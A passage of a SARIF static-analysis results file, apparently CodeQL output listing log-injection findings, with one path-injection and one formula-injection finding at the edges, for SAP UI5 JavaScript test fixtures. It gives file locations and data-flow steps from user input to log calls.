- } - }, - "message" : { - "text" : "oModel. ... input')" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 235 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 8, - "startColumn" : 26, - "endColumn" : 31 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "62d5a4db56a18502:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 6, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "jQuery. ... param\")" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 6, - "startColumn" : 9, - "endColumn" : 51 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 8, - "startColumn" : 26, - "endColumn" : 31 - } - }, - "message" : { - "text" : "value" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 6, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 16, - "startColumn" : 26, - "endColumn" : 31 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "751ece7cb6fd18f7:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 13, - "startColumn" : 23, - "endColumn" : 30 - } - }, - "message" : { - "text" : "req.url" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 13, - "startColumn" : 13, - "endColumn" : 37 - } - }, - "message" : { - "text" : "url.par ... , true)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 13, - "startColumn" : 9, - "endColumn" : 37 - } - }, - "message" : { - "text" : "q" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 14, - "startColumn" : 17, - "endColumn" : 18 - } - }, - "message" : { - "text" : "q" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 14, - "startColumn" : 17, - "endColumn" : 24 - } - }, - "message" : { - "text" : "q.query" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 14, - "startColumn" : 17, - "endColumn" : 33 - } - }, - "message" : { - "text" : "q.query.username" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 14, - "startColumn" : 9, - "endColumn" : 33 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 16, - "startColumn" : 26, - "endColumn" : 31 - } - }, - "message" : { - "text" : "value" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 13, - "startColumn" : 23, - "endColumn" : 30 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 171 - }, - "region" : { - "startLine" : 13, - "startColumn" : 38, - "endColumn" : 56 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "fb0b88ea7a3fc8f1:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 175 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 172 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 171 - }, - "region" : { - "startLine" : 7, - "startColumn" : 23, - "endColumn" : 38 - } - }, - "message" : { - "text" : "{ type: \"int\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 171 - }, - "region" : { - "startLine" : 13, - "startColumn" : 38, - "endColumn" : 56 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 175 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 25, - "startColumn" : 26, - "endColumn" : 32 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "191c273ff0751536:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 21, - "startColumn" : 23, - "endColumn" : 30 - } - }, - "message" : { - "text" : "req.url" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 21, - "startColumn" : 13, - "endColumn" : 37 - } - }, - "message" : { - "text" : "url.par ... , true)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 21, - "startColumn" : 9, - "endColumn" : 37 - } - }, - "message" : { - "text" : "q" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 22, - "startColumn" : 17, - "endColumn" : 18 - } - }, - "message" : { - "text" : "q" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 22, - "startColumn" : 17, - "endColumn" : 24 - } - }, - "message" : { - "text" : "q.query" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 22, - "startColumn" : 17, - "endColumn" : 33 - } - }, - "message" : { - "text" : "q.query.username" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 22, - "startColumn" : 9, - "endColumn" : 33 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 23, - "startColumn" : 39, - "endColumn" : 44 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 23, - "startColumn" : 18, - "endColumn" : 45 - } - }, - "message" : { - "text" : "jQuery. ... (value)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 23, - "startColumn" : 9, - "endColumn" : 45 - } - }, - "message" : { - "text" : "value1" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 25, - "startColumn" : 26, - "endColumn" : 32 - } - }, - "message" : { - "text" : "value1" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 21, - "startColumn" : 23, - "endColumn" : 30 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 179 - }, - "region" : { - "startLine" : 17, - "startColumn" : 38, - "endColumn" : 47 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "f32b0dcd4573d6a3:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 184 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 185 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 179 - }, - "region" : { - "startLine" : 8, - "startColumn" : 23, - "endColumn" : 41 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 179 - }, - "region" : { - "startLine" : 15, - "startColumn" : 29, - "endColumn" : 47 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 179 - }, - "region" : { - "startLine" : 15, - "startColumn" : 21, - "endColumn" : 47 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 179 - }, - "region" : { - "startLine" : 16, - "startColumn" : 50, - "endColumn" : 55 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 179 - }, - "region" : { - "startLine" : 16, - "startColumn" : 43, - "endColumn" : 56 - } - }, - "message" : { - "text" : "String(value)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 179 - }, - "region" : { - "startLine" : 16, - "startColumn" : 33, - "endColumn" : 57 - } - }, - "message" : { - "text" : "encodeX ... value))" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 179 - }, - "region" : { - "startLine" : 16, - "startColumn" : 21, - "endColumn" : 57 - } - }, - "message" : { - "text" : "sanitized" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 179 - }, - "region" : { - "startLine" : 17, - "startColumn" : 38, - "endColumn" : 47 - } - }, - "message" : { - "text" : "sanitized" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 184 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 188 - }, - "region" : { - "startLine" : 17, - "startColumn" : 34, - "endColumn" : 39 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "392fd43c95c7be9c:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 192 - }, - "region" : { - "startLine" : 6, - "startColumn" : 5, - "endLine" : 8, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 188 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 188 - }, - "region" : { - "startLine" : 15, - "startColumn" : 25, - "endColumn" : 53 - } - }, - "message" : { - "text" : "oModel. ... input')" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 188 - }, - "region" : { - "startLine" : 15, - "startColumn" : 17, - "endColumn" : 53 - } - }, - "message" : { - "text" : "input" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 188 - }, - "region" : { - "startLine" : 17, - "startColumn" : 34, - "endColumn" : 39 - } - }, - "message" : { - "text" : "input" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 192 - }, - "region" : { - "startLine" : 6, - "startColumn" : 5, - "endLine" : 8, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 197 - }, - "region" : { - "startLine" : 16, - "startColumn" : 30, - "endColumn" : 35 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "27d08bf2c216b384:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 204 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 197 - }, - "region" : { - "startLine" : 8, - "startColumn" : 11, - "endColumn" : 22 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 197 - }, - "region" : { - "startLine" : 14, - "startColumn" : 21, - "endColumn" : 49 - } - }, - "message" : { - "text" : "oModel. ... input\")" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 197 - }, - "region" : { - "startLine" : 14, - "startColumn" : 13, - "endColumn" : 49 - } - }, - "message" : { - "text" : "input" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 197 - }, - "region" : { - "startLine" : 16, - "startColumn" : 30, - "endColumn" : 35 - } - }, - "message" : { - "text" : "input" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-remote/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 204 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 206 - }, - "region" : { - "startLine" : 17, - "startColumn" : 34, - "endColumn" : 39 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "392fd43c95c7be9c:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 209 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 206 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 206 - }, - "region" : { - "startLine" : 15, - "startColumn" : 25, - "endColumn" : 53 - } - }, - "message" : { - "text" : "oModel. ... input')" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 206 - }, - "region" : { - "startLine" : 15, - "startColumn" : 17, - "endColumn" : 53 - } - }, - "message" : { - "text" : "input" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 206 - }, - "region" : { - "startLine" : 17, - "startColumn" : 34, - "endColumn" : 39 - } - }, - "message" : { - "text" : "input" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 209 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-formula-injection", - "rule" : { - "id" : "js/ui5-formula-injection", - "index" : 4, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "The content of a saved file depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 145 - }, - "region" : { - "startLine" : 17, - "startColumn" : 27, - "endColumn" : 45 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "41899ff1a967017d:1", - "primaryLocationStartColumnFingerprint" : "10" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 